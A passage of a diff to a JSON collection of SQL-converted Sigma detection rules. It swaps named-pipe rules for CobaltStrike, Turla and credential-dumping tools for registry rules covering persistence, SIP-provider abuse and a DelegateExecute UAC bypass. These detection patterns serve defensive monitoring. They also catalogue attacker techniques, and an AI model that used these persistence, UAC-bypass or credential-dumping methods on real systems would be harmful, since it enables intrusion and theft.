TargetObject LIKE '%\\\\Explorer\\\\SharedTaskScheduler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\PLAP Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Provider Filters%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)' OR TargetObject LIKE '%\\\\NgcFirst\\\\ConsecutiveSwitchCount' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Spotify\\\\Spotify.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\devicecensus.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\winsat.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft OneDrive\\\\StandaloneUpdater\\\\OneDriveSetup.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\KeePass Password Safe 2\\\\ShInstUtil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Everything\\\\Everything.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\LogonUI.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{D6886603-9D2F-4EB2-B667-1971041FA96B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{BEC09223-B018-416D-A0AC-523971B639F5}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential 
Providers\\\\{8AF662BF-65A0-4D0A-A540-A338A999D36F}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{27FBDB57-B613-4AF2-9D7E-4FA7A66C21AD}\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\regsvr32.exe' ESCAPE '\\' AND TargetObject LIKE '%DropboxExt%' ESCAPE '\\' AND NewValue LIKE '%A251-47B7-93E1-CDD82E34AF8B}' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Opera Browser Assistant' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Program Files\\\\Opera\\\\assistant\\\\browser\\_assistant.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\iTunesHelper' ESCAPE '\\' AND NewValue LIKE '\"C:\\\\Program Files\\\\iTunes\\\\iTunesHelper.exe\"' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\zoommsirepair' ESCAPE '\\' AND NewValue LIKE '\"C:\\\\Program Files\\\\Zoom\\\\bin\\\\installer.exe\" /repair' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Greenshot' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Program Files\\\\Greenshot\\\\Greenshot.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\GoogleDriveFS' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\GoogleDriveFS.exe%' ESCAPE '\\') OR (TargetObject LIKE '%GoogleDrive%' ESCAPE '\\' AND NewValue IN ('{CFE8B367-77A7-41D7-9C90-75D16D7DC6B6}', '{A8E52322-8734-481D-A7E2-27B309EF8D56}', 
'{C973DA94-CBDF-4E77-81D1-E5B794FBD146}', '{51EF1569-67EE-4AD6-9646-E726C3FFC8A2}')) OR ((NewValue LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c rmdir /s /q \"C:\\\\Users\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c del /q \"C:\\\\Users\\\\%' ESCAPE '\\') AND NewValue LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{%' ESCAPE '\\' AND NewValue LIKE '%\\\\AppData\\\\Local\\\\Package Cache\\\\{%' ESCAPE '\\' AND NewValue LIKE '%}\\\\python-%' ESCAPE '\\' AND NewValue LIKE '%.exe\" /burn.runonce' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND NewValue LIKE '%\\\\Microsoft\\\\Teams\\\\Update.exe --processStart %' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\userinit.exe' ESCAPE '\\' AND NewValue = 'ctfmon.exe /n') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\Setup\\\\%' ESCAPE '\\' AND (NewValue LIKE '\"C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\AvLaunch.exe\" /gui' ESCAPE '\\' OR NewValue LIKE '\"C:\\\\Program Files (x86)\\\\AVG\\\\Antivirus\\\\AvLaunch.exe\" /gui' ESCAPE '\\' OR NewValue LIKE '{472083B0-C522-11CF-8763-00608CC02F24}' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\aurora-dashboard' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Program 
Files\\\\Aurora-Agent\\\\tools\\\\aurora-dashboard.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Everything' ESCAPE '\\' AND NewValue LIKE '%\\\\Everything\\\\Everything.exe\" -startup' ESCAPE '\\')))" ], - "filename": "pipe_created_psexec_pipes_artifacts.yml" + "filename": "registry_set_asep_reg_keys_modification_currentversion.yml" }, { - "title": "Malicious Named Pipe", - "id": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", - "status": "test", - "description": "Detects the creation of a named pipe used by known APT malware", - "author": "Florian Roth (Nextron Systems), blueteam0ps, elhoim", + "title": "Potential Persistence Via Mpnotify", + "id": "92772523-d9c1-4c93-9547-b0ca500baba3", + "status": "experimental", + "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Might trigger if a legitimate new SIP provider is registered. 
But this is not a common occurrence in an environment and should be investigated either way" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '\\\\isapi\\_http' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg2' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\ahexec' ESCAPE '\\' OR PipeName LIKE '\\\\winsession' ESCAPE '\\' OR PipeName LIKE '\\\\lsassw' ESCAPE '\\' OR PipeName LIKE '\\\\46a676ab7f179e511e30dd2dc41bd388' ESCAPE '\\' OR PipeName LIKE '\\\\9f81f59bc58452127884ce513865ed20' ESCAPE '\\' OR PipeName LIKE '\\\\e710f28d59aa529d6792ca6ff0ca1b34' ESCAPE '\\' OR PipeName LIKE '\\\\rpchlp\\_3' ESCAPE '\\' OR PipeName LIKE '\\\\NamePipe\\_MoreWindows' ESCAPE '\\' OR PipeName LIKE '\\\\pcheap\\_reuse' ESCAPE '\\' OR PipeName LIKE '\\\\gruntsvc' ESCAPE '\\' OR PipeName LIKE '\\\\583da945-62af-10e8-4902-a8f205c72b2e' ESCAPE '\\' OR PipeName LIKE '\\\\bizkaz' ESCAPE '\\' OR PipeName LIKE '\\\\svcctl' ESCAPE '\\' OR PipeName LIKE '\\\\Posh%' ESCAPE '\\' OR PipeName LIKE '\\\\jaccdpqnvbrrxlaf' ESCAPE '\\' OR PipeName LIKE '\\\\csexecsvc' ESCAPE '\\' OR PipeName LIKE '\\\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' ESCAPE '\\' OR PipeName LIKE '\\\\adschemerpc' ESCAPE '\\' OR PipeName LIKE '\\\\AnonymousPipe' ESCAPE '\\' OR PipeName LIKE '\\\\bc367' ESCAPE '\\' OR PipeName LIKE '\\\\bc31a7' ESCAPE '\\' OR PipeName LIKE '\\\\testPipe' ESCAPE '\\' OR PipeName LIKE '\\\\dce\\_3d' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\mpnotify%' ESCAPE '\\')" ], - "filename": "pipe_created_mal_namedpipes.yml" + "filename": "registry_set_persistence_mpnotify.yml" }, { - "title": "Cred Dump-Tools Named Pipes", - "id": 
"961d0ba2-3eea-4303-a930-2cf78bbfcc5e", + "title": "Potential Persistence Via Event Viewer Events.asp", + "id": "a1e11042-a74a-46e6-b07c-c4ce8ecc239b", "status": "test", - "description": "Detects well-known credential dumping tools execution via specific named pipes", - "author": "Teymur Kheirkhabarov, oscd.community", - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005" - ], - "falsepositives": [ - "Legitimate Administrator using tool for password recovery" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '%\\\\lsadump%' ESCAPE '\\' OR PipeName LIKE '%\\\\cachedump%' ESCAPE '\\' OR PipeName LIKE '%\\\\wceservicepipe%' ESCAPE '\\')" - ], - "filename": "pipe_created_cred_dump_tools_named_pipes.yml" - }, - { - "title": "Koh Default Named Pipes", - "id": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", - "status": "experimental", - "description": "Detects creation of default named pipes used by the Koh tool", + "description": "Detects potential registry persistence technique using the Event Viewer \"Events.asp\" technique", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1528", - "attack.t1134.001" + "attack.persistence", + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '%\\\\imposecost%' ESCAPE '\\' OR PipeName LIKE '%\\\\imposingcost%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionURL%' 
ESCAPE '\\') AND NOT ((NewProcessName LIKE '%C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgram' ESCAPE '\\' AND NewValue LIKE '\\%\\%SystemRoot\\%\\%\\\\PCHealth\\\\HelpCtr\\\\Binaries\\\\HelpCtr.exe' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgramCommandLineParameters' ESCAPE '\\' AND NewValue LIKE '-url hcp://services/centers/support_topic=\\%\\%s' ESCAPE '\\') OR (NewValue = 'http://go.microsoft.com/fwlink/events.asp') OR (NewValue = '(Empty)')))" ], - "filename": "pipe_created_koh_default_pipe.yml" + "filename": "registry_set_persistence_event_viewer_events_asp.yml" }, { - "title": "ADFS Database Named Pipe Connection", - "id": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", - "status": "test", - "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Modification of Explorer Hidden Keys", + "id": "5a5152f1-463f-436b-b2f5-8eceb3964b42", + "status": "experimental", + "description": "Detects modifications to the hidden files keys in registry. 
This technique is abused by several malware families to hide their files from normal users.", + "author": "frack113", "tags": [ - "attack.collection", - "attack.t1005" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ - "Processes in the filter condition" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '\\\\MICROSOFT##WID\\\\tsql\\\\query' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft.IdentityServer.ServiceHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AzureADConnect.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Tri.Sensor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tssdis.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowSuperHidden' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "pipe_created_susp_adfs_namedpipe_connection.yml" + "filename": "registry_set_hide_file.yml" }, { - "title": "EfsPotato Named Pipe", - "id": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", + "title": "Service Binary in Uncommon Folder", + "id": "277dc340-0540-42e7-8efb-5ff460045e07", "status": "experimental", - "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", + "description": "Detect the creation of a service with a service binary located in a uncommon directory", "author": "Florian Roth (Nextron Systems)", 
"tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((PipeName LIKE '%\\\\pipe\\\\%' ESCAPE '\\' OR PipeName LIKE '%\\\\pipe\\\\srvsvc%' ESCAPE '\\') AND NOT (PipeName LIKE '%\\\\CtxShare%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\') AND NewValue IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (NewValue LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Zoom%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Zoom%' ESCAPE '\\') OR (NewValue LIKE '%\\\\AppData\\\\Roaming\\\\Zoom%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Zoom%' ESCAPE '\\')))" ], - "filename": "pipe_created_efspotato_namedpipe.yml" + "filename": "registry_set_creation_service_uncommon_folder.yml" }, { - "title": "CobaltStrike Named Pipe Patterns", - "id": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", - "status": "test", - "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", - "author": "Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", + "title": "Persistence Via New SIP Provider", + "id": "5a2b21ee-6aaa-4234-ac9d-59a59edf90a1", 
+ "status": "experimental", + "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1553.003" ], "falsepositives": [ - "Chrome instances using the exact same pipe name \"mojo.something\"" + "Legitimate SIP being registered by the OS or different software." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((((PipeName LIKE '\\\\mojo.5688.8052.183894939787088877%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo.5688.8052.35780273329370473%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-f%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-h%' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs%' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\_svc%' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss%' ESCAPE '\\' OR PipeName LIKE '\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc%' ESCAPE '\\' OR PipeName LIKE '\\\\f53f%' ESCAPE '\\' OR PipeName LIKE '\\\\windows.update.manager%' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester%' ESCAPE '\\' OR PipeName LIKE '\\\\DserNamePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds%' ESCAPE '\\' OR PipeName LIKE '\\\\f4c3%' ESCAPE '\\' OR PipeName LIKE '\\\\fullduplex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\rpc\\_%' ESCAPE '\\') OR (PipeName LIKE '\\\\demoagent\\_11' ESCAPE '\\' OR PipeName LIKE '\\\\demoagent\\_22' ESCAPE '\\')) OR (PipeName LIKE '\\\\Winsock2\\\\CatalogChangeListener-%' ESCAPE '\\' AND PipeName LIKE '%-0,' ESCAPE '\\')) AND NOT ((PipeName LIKE '\\\\wkssvc' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester' ESCAPE '\\' OR 
PipeName LIKE '\\\\PGMessagePipe' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Dll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\$DLL%' ESCAPE '\\')) AND NOT ((NewValue IN ('WINTRUST.DLL', 'mso.dll')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\CryptSIPDll%' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Windows\\\\System32\\\\PsfSip.dll' ESCAPE '\\')))" ], - "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml" + "filename": "registry_set_sip_persistence.yml" }, { - "title": "PsExec Tool Execution From Suspicious Locations - PipeName", - "id": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", - "status": "experimental", - "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Keyboard Layout Load", + "id": "34aa0252-6039-40ff-951f-939fd6ce47d8", + "status": "test", + "description": "Detects the keyboard preload installation with a suspicious keyboard layout, e.g. 
Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Rare legitimate use of psexec from the locations mentioned above" + "Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\' AND (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Keyboard Layout\\\\Preload\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Keyboard Layout\\\\Substitutes\\\\%' ESCAPE '\\') AND (NewValue LIKE '%00000429%' ESCAPE '\\' OR NewValue LIKE '%00050429%' ESCAPE '\\' OR NewValue LIKE '%0000042a%' ESCAPE '\\'))" ], - "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml" + "filename": "registry_set_susp_keyboard_layout_load.yml" }, { - "title": "DiagTrackEoP Default Named Pipe", - "id": "1f7025a6-e747-4130-aac4-961eb47015f1", - "status": "experimental", - "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Bypass UAC Using DelegateExecute", + "id": "46dd5308-4572-4d12-aa43-8938f0184d4f", + "status": "test", + "description": "Bypasses User Account Control using a fileless method", + "author": 
"frack113", "tags": [ - "attack.privilege_escalation" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE PipeName LIKE '%thisispipe%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\' AND NewValue = '(Empty)')" ], - "filename": "pipe_created_diagtrack_eop_default_pipe.yml" + "filename": "registry_set_bypass_uac_using_delegateexecute.yml" }, { - "title": "Turla Group Named Pipes", - "id": "739915e4-1e70-4778-8b8a-17db02f66db1", - "status": "test", - "description": "Detects a named pipe used by Turla group samples", - "author": "Markus Neis", + "title": "Blue Mockingbird - Registry", + "id": "92b0b372-a939-44ed-a11b-5136cf680e27", + "status": "experimental", + "description": "Attempts to detect system changes made by Blue Mockingbird", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.g0010", "attack.execution", - "attack.t1106" + "attack.t1112", + "attack.t1047" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '\\\\atctl' ESCAPE '\\' OR PipeName LIKE '\\\\userpipe' ESCAPE '\\' OR PipeName LIKE '\\\\iehelper' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\comnap' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\wercplsupport\\\\Parameters\\\\ServiceDll' ESCAPE '\\')" ], - "filename": "pipe_created_apt_turla_namedpipes.yml" + "filename": "registry_set_mal_blue_mockingbird.yml" }, { - "title": 
"CobaltStrike Named Pipe Pattern Regex", - "id": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", - "status": "test", - "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", - "author": "Florian Roth (Nextron Systems)", + "title": "Service Binary in Suspicious Folder", + "id": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", + "status": "experimental", + "description": "Detect the creation of a service with a service binary located in a suspicious directory", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (PipeName REGEXP '\\\\mojo\\.5688\\.8052\\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' OR PipeName REGEXP '\\\\wkssvc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\ntsvcs[0-9a-f]{2}' OR PipeName REGEXP '\\\\DserNamePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\SearchTextHarvester[0-9a-f]{2}' OR PipeName REGEXP '\\\\mypipe-(?:f|h)[0-9a-f]{2}' OR PipeName REGEXP '\\\\windows\\.update\\.manager[0-9a-f]{2,3}' OR PipeName REGEXP '\\\\ntsvcs_[0-9a-f]{2}' OR PipeName REGEXP '\\\\scerpc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\PGMessagePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\MsFteWds[0-9a-f]{2}' OR PipeName REGEXP '\\\\f4c3[0-9a-f]{2}' OR PipeName REGEXP '\\\\fullduplex_[0-9a-f]{2}' OR PipeName REGEXP '\\\\msrpc_[0-9a-f]{4}' OR PipeName REGEXP '\\\\win\\\\msrpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\f53f[0-9a-f]{2}' OR PipeName REGEXP '\\\\rpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\spoolss_[0-9a-f]{2}' OR PipeName REGEXP 